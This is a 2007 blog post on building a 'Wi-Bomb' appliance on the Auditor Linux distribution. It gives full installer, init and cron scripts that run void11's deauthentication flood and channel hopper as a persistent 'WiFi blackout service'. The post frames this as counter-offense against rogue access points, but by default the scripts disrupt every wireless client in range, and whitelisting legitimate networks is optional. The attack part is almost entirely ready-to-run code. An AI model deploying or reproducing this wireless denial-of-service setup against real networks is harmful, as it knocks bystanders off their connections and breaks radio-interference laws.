Friday, May 4, 2007

Creating a Void11 Counter-Offensive Wi-Bomb on Auditor

Requirements:

  • Auditor ISO (http://mirror.switch.ch/ftp/mirror/auditor/ )
  • Laptop with available hard-drive for installation. Recommend 256+ MB RAM and P4 or better CPU. Must have PCMCIA slot. On-board NIC for external connectivity and management if desired.
  • SMC 2532W-B Intersil Prism-based WiFi card. Also has external antennae jacks.
  • 9dBi omni- or dual semi-directional patch antennas

Boot up Auditor and perform a permanent installation to the hard drive. Create these files on the system, then run the installation file. Test by executing '/etc/init.d/void11 start' with the SMC card inserted. Reboot and verify operation with a test of a "rouge" AP and an independent client attempting to connect. Best performed when you allow the client to connect, do a perpetual ping, then turn on your Wi-bomb appliance and watch it die.

You can later integrate known-good access points into the appliance by creating a matchlist and adjusting the OPTIONS parameter in the 'void11' script to include "-l /path/to/matchilst". See William Hidalgo's excellent writeup for more inforamtion on formatting the matchlist file.

References:

William Hidalgo's well-written article on using Void11 as a counter-offensive tool to protect networks : "Void11 Rouge Access Point Counter Offense" (http://remote-exploit.org/research/void11rougeaccesspoint.html )

Scripts:

void11_installer.sh

#!/bin/sh
cp -f void11 /etc/init.d/
chmod 755 /etc/init.d/void11
cp -f void11.cron /etc/cron.daily/void11
chmod 755 /etc/cron.daily/void11
ln -s /etc/init.d/sysklogd /etc/rc.boot/S65syslog
ln -s /etc/init.d/void11 /etc/rc.boot/S99void11
ln -s /etc/init.d/void11 /etc/rc6.d/K15void11
ln -s /etc/init.d/void11 /etc/rc0.d/K15void11
ln -s /etc/init.d/sysklogd /etc/rc0.d/K10syslog
ln -s /etc/init.d/sysklogd /etc/rc0.d/K10syslog
touch /var/log/void11
chmod 600 /var/log/void11
echo Now that installation is complete, run Void11 by issuing
echo
echo /etc/init.d/sysklogd start
echo /etc/init.d/void11 start

voider.sh

#!/bin/sh
#rm -Rf /etc/pcmcia
#cp -R /etc/pcmcia-hostap /etc/pcmcia
rm -f /etc/pcmcia/wlan-ng*
killall -HUP cardmgr
cardctl eject
sleep 1
cardctl insert
sleep 2
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
sleep 1
void11_hopper > /dev/null &
void11_penetration -t 1 -d 10 wlan0

void11.cron

#!/bin/sh

test -x /usr/local/bin/void11_hopper || exit 0
test -x /usr/local/bin/void11_penetration || exit 0
/etc/init.d/void11 restart

void11

#!/bin/sh

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin

OPTIONS="-t 1 -d 10 wlan0"

PIDFILE=/var/run/void11_penetration.pid
RIDFILE=/var/run/void11_hopper.pid
DAEMON=/usr/local/bin/void11_penetration
RAEMON=/usr/local/bin/void11_hopper

case "$1" in
start)
echo -n "Starting WiFi blackout service: void11"

if [ ! -x $RAEMON ]; then
echo "void11_hopper script missing - not starting"
exit 1
fi
if [ ! -x $DAEMON ]; then
echo "void11_penetration binary missing - not starting"
exit 1
fi
rm -f /etc/pcmcia/wlan-ng*
killall -HUP cardmgr
cardctl eject
sleep 1
cardctl insert
sleep 2
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
sleep 1
$RAEMON > /dev/null &
$DAEMON $OPTIONS > /var/log/void11 &
echo "."
;;

stop)
echo -n "Stopping WiFi blackout service: void11"
killall void11_penetration
sleep 2
killall void11_hopper
sleep 2
echo "."
;;

reload)
$0 restart
;;

restart|force-reload)
$0 stop
sleep 2
$0 start
;;

*)
echo "Usage: /etc/init.d/void11 {start|stop|reload|restart|force-reload}" >&2
exit 1
;;
esac

exit 0